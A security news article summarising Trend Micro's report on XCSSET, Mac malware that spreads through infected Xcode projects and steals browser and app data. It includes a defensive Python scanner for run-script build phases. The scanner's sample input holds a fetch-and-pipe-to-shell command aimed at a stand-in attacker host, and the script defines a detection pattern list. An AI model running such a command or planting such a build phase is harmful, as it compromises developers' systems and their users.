Security researchers have discovered a new Mac malware dubbed XCSSET. The malware not only inserts malicious code into Xcode projects, but also leverages two zero-days to exploit a flaw in Data Vaults and plant a JavaScript backdoor in Safari.
According to Trend Micro, the threat poses a risk to Xcode developers because they share their projects via GitHub. As a result, the malware-infected code can lead to a “supply-chain” type attack against other users or organizations that rely on those code repositories.
“These Xcode projects have been modified such that upon building, these projects would run malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system,” Trend Micro explained in its blog post.
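Because the infection vector described above is code that runs when a shared project is built, a defender can enumerate the run-script build phases in a project's project.pbxproj before building it. The following script is an added example, not Trend Micro's tooling or anything from the report; it assumes build-time code lives in PBXShellScriptBuildPhase objects (the standard Xcode mechanism), uses a constructed pbxproj fragment as sample input, and its indicator list is a constructed heuristic.

```python
"""Flag run-script build phases in an Xcode project.pbxproj before the project is built."""
import re
import sys

# Constructed sample in pbxproj (old-style plist) syntax; not from any real project.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
	AB12 /* ShellScript */ = {
		isa = PBXShellScriptBuildPhase;
		name = "Run Script";
		shellScript = "echo \"linting\"\nswiftlint\n";
	};
	CD34 /* ShellScript */ = {
		isa = PBXShellScriptBuildPhase;
		shellScript = "curl -fsSL https://attacker.invalid/stage1 | sh\n";
	};
/* End PBXShellScriptBuildPhase section */
'''
OBJECT_RE = re.compile(r'(\w+)\s*(?:/\*.*?\*/)?\s*=\s*\{(.*?)\};', re.S)  # id /* comment */ = { ... };
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"')
NAME_RE = re.compile(r'\bname\s*=\s*"?([^";]+)"?;')
# Heuristic indicators, constructed for this example; any hit means "review before building".
INDICATORS = (
    ('remote fetch', re.compile(r'\b(curl|wget)\b')),
    ('pipe to shell', re.compile(r'\|\s*(ba|z)?sh\b')),
    ('encoded payload', re.compile(r'base64\s+(-d|-D|--decode)\b')),
    ('eval/osascript', re.compile(r'\b(eval|osascript)\b')),
)

def _unescape(s):
    # pbxproj quotes strings C-style: \" \\ \n \t
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)

def find_run_script_phases(pbxproj_text):
    """Return one dict per PBXShellScriptBuildPhase: id, name, decoded script, indicators hit."""
    findings = []
    for obj_id, body in OBJECT_RE.findall(pbxproj_text):
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue  # other object types (targets, file refs, ...) are not build-time code
        script_m, name_m = SCRIPT_RE.search(body), NAME_RE.search(body)
        script = _unescape(script_m.group(1)) if script_m else ''
        findings.append({'id': obj_id, 'name': name_m.group(1) if name_m else '(unnamed)', 'script': script,
                         'indicators': [label for label, rx in INDICATORS if rx.search(script)]})
    return findings

if __name__ == '__main__':  # usage: python3 check_pbxproj.py [path/to/project.pbxproj]
    text = open(sys.argv[1], encoding='utf-8').read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for p in find_run_script_phases(text):
        print(f"[{'REVIEW' if p['indicators'] else 'ok'}] {p['id']} {p['name']}: "
              f"{', '.join(p['indicators']) or 'no indicators'}")
```

Every run-script phase is worth a look regardless of indicators, since a phase that merely runs a binary checked into the repository would not trigger any of them.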
Trend Micro further describes the threat's components: the XCSSET trojan itself and its command-and-control (C2) related files.
According to the report, XCSSET also performs the following malicious behavior:
- Launches Universal Cross-site Scripting (UXSS) attacks to plant a JavaScript backdoor in Safari, which in turn injects JavaScript backdoors into websites.
- Exploits a vulnerability to read and dump Safari cookies to steal user data.
- Steals information from the user’s Evernote, Notes, Skype, Telegram, QQ, and WeChat apps.
- Takes screenshots of the victim’s current screen.
- Uploads files from the infected system to the attacker’s specified server.
- Encrypts files and shows a ransom note, if commanded by the server.
In addition, Trend Micro warned that XCSSET “is theoretically capable of modifying almost every part of the user’s browser experience as arbitrary JavaScript-injected code.”
For instance, the malware can steal credentials (e.g., PayPal, Apple ID) and payment card data from the Apple Store, or modify cryptocurrency addresses, to name a few.
For more technical details, check out Trend Micro’s XCSSET technical brief.
Readers can also check out Trend Micro’s previous report on “ThiefQuest,” another malware threat targeting macOS systems that encrypts files and installs keyloggers.